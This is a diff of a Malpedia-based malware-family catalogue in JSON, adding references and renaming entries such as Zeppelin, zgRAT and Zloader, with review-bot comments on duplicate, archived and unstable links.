 "uuid": "5587d163-d5ec-43fc-8071-7e7cd1002ba7",
- "value": "Zeppelin Ransomware"
+ "value": "Zeppelin"
 },
 {
 "description": "",
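Review bot: The Malpedia slug changes from `win.zeppelin_ransomware` to `win.zeppelin` and the `value` from `Zeppelin Ransomware` to `Zeppelin`, but `"synonyms": []` is left empty, so any existing event tagged with the old cluster name no longer matches this entry unless the consumer matches on the unchanged UUID; add `"synonyms": [ "Zeppelin Ransomware" ]`. Note that the Yakuza entry earlier in this diff keeps its `win.yakuza_ransomware` slug while its value is shortened the same way, so one of the two slugs should be checked against Malpedia for the current canonical form. The shuffle of the pardot, medium and cylance links is a pure reorder.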
@@ -33495,6 +38072,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess",
 "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html",
 "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/",
+ "https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail",
 "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/",
 "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/",
 "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/",
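Review bot: The added ResearchGate link embeds an author-profile path, an opaque `links/5fa9608792851cc286a08592/` download token and a `?origin=publication_detail` tracking parameter, all of which are specific to ResearchGate's mirror and prone to rot, and the download token in particular is not a stable identifier for the paper. Cite the publisher's page or DOI for publication 320250366 (or the authors' own copy), and at minimum strip the query string so the ref is a plain document URL.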
@@ -33572,29 +38150,40 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
 "https://www.s21sec.com/en/zeus-the-missing-link/",
 "https://www.secureworks.com/research/threat-profiles/gold-evergreen",
 "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html",
 "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite",
 "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html",
+ "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
 "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/",
 "http://eternal-todo.com/blog/new-zeus-binary",
+ "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/",
+ "http://www.secureworks.com/research/threat-profiles/gold-evergreen",
+ "https://www.wired.com/2017/03/russian-hacker-spy-botnet/",
 "https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
 "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html",
 "http://eternal-todo.com/blog/zeus-spreading-facebook",
 "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html",
+ "https://www.anomali.com/files/white-papers/russian-federation-country-profile.pdf",
 "https://www.secureworks.com/research/zeus?threat=zeus",
 "https://www.secureworks.com/research/threat-profiles/bronze-woodland",
 "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html",
 "http://eternal-todo.com/blog/detecting-zeus",
- "https://www.anomali.com/files/white-papers/russian-federation-country-profile.pdf",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
 "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
 "https://nakedsecurity.sophos.com/2010/07/24/sample-run/",
 "https://www.mnin.org/write/ZeusMalware.pdf",
 "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20",
 "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://blog.malwarebytes.com/101/2021/07/the-life-and-death-of-the-zeus-trojan/",
 "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf",
 "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html",
 "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html"
@@ -33677,6 +38266,19 @@
 "uuid": "38de079b-cc4c-47b0-b47f-ad4c013d8a1f",
 "value": "Zezin"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat",
+ "https://bazaar.abuse.ch/browse/signature/zgRAT/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0c3ea882-72a7-4838-b79a-150be30b6a36",
+ "value": "zgRAT"
+ },
 {
 "description": "",
 "meta": {
@@ -33709,7 +38311,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.zitmo",
- "https://securelist.com/zeus-in-the-mobile-facts-and-theories/36424/"
+ "https://securelist.com/zeus-in-the-mobile-facts-and-theories/36424/",
+ "https://mobisec.reyammer.io/slides"
 ],
 "synonyms": [
 "ZeuS-in-the-Mobile"
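Review bot: `http://www.secureworks.com/research/threat-profiles/gold-evergreen` is added although the identical page is already listed a few lines above as `https://www.secureworks.com/research/threat-profiles/gold-evergreen`, so this is a duplicate that differs only by scheme and it also introduces a plaintext-HTTP link for a page served over TLS; drop the new `http://` line. The Anomali country-profile PDF is only moved within the list, not changed. The Black Hat EU 2010 slides are correctly cited through a pinned `web.archive.org` snapshot, which is the right pattern for dead-host material and could be applied to the `http://` blogspot/eternal-todo refs in the same list.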
@@ -33737,46 +38340,64 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
 "https://securityliterate.com/chantays-resume-investigating-a-cv-themed-zloader-malware-campaign/",
+ "https://www.sentinelone.com/labs/hide-and-seek-new-zloader-infection-chain-comes-with-improved-stealth-and-evasion-mechanisms/",
 "https://twitter.com/ffforward/status/1324281530026524672",
 "https://twitter.com/VK_Intel/status/1294320579311435776",
 "https://clickallthethings.wordpress.com/2020/09/21/zloader-xlm-update-macro-code-and-behavior-change/",
 "https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://cybleinc.com/2021/04/19/zloader-returns-through-spelevo-exploit-kit-phishing-campaign/",
 "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
 "https://info.phishlabs.com/blog/surge-in-zloader-attacks-observed",
 "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/",
+ "https://blogs.quickheal.com/zloader-entailing-different-office-files/",
 "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
 "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://web.archive.org/web/20200929145931/https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/",
 "https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/",
 "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
 "https://johannesbader.ch/blog/the-dga-of-zloader/",
 "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware",
 "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
 "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/",
+ "https://info.phishlabs.com/blog/zloader-dominates-email-payloads-in-q1",
 "https://clickallthethings.wordpress.com/2020/06/19/zloader-vba-r1c1-references-and-other-tomfoolery/",
 "https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
+ "https://www.hornetsecurity.com/en/threat-research/zloader-email-campaign-using-mhtml-to-download-and-decrypt-xls/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf",
 "https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks",
 "https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/",
- "https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
 "https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns",
 "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/",
 "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
+ "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/",
 "https://www.youtube.com/watch?v=QBoj6GB79wM",
 "https://securityintelligence.com/zeus-sphinx-pushes-empty-configuration-files-what-has-the-sphinx-got-cooking/",
 "https://blag.nullteilerfrei.de/2020/05/24/zloader-string-obfuscation/",
 "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
 "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
 "https://blog.malwarebytes.com/threat-analysis/2020/11/malsmoke-operators-abandon-exploit-kits-in-favor-of-social-engineering-scheme/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/zloader-campaigns-at-a-glance",
 "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
 "https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://labs.k7computing.com/?p=22458",
 "https://blog.alyac.co.kr/3322",
 "https://blag.nullteilerfrei.de/2020/06/11/api-hashing-in-the-zloader-malware/",
 "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/",
 "https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit",
 "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
+
"https://www.forcepoint.com/blog/x-labs/invoicing-spam-campaigns-malware-zloader",
 "https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/",
 "https://www.lac.co.jp/lacwatch/people/20201106_002321.html"
 ],
@@ -33859,5 +38480,5 @@
 "value": "Zyklon"
 }
 ],
- "version": 8790
+ "version": 11601
 }
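Review bot: Two references now appear both live and archived — the Comae post `2020-03-13_yet-another-active-email-campaign-...` next to its `web.archive.org/web/20200929145931/` copy, and the `cisoclub.ru` Group-IB PDF next to its `web.archive.org/web/20210305181115/` copy — and the mal-eats CAMPO write-up is listed twice, once as `/en/2021/05/11/` and once as the Japanese `/2021/05/10/` page. If the archived copies are deliberate link-rot insurance that is reasonable, but it should be stated in the commit message and each pair kept adjacent; otherwise keep one entry each. The hunk also moves the zdnet and Malwarebytes entries without changing them, which makes the genuine additions hard to pick out, and two added lines (`ptsecurity.com/.../paas-or-how-hackers-evade-antivirus-software/` and `forcepoint.com/blog/x-labs/...`) have their `+` marker separated from the URL in the pasted diff, so the patch as shown here would not apply cleanly.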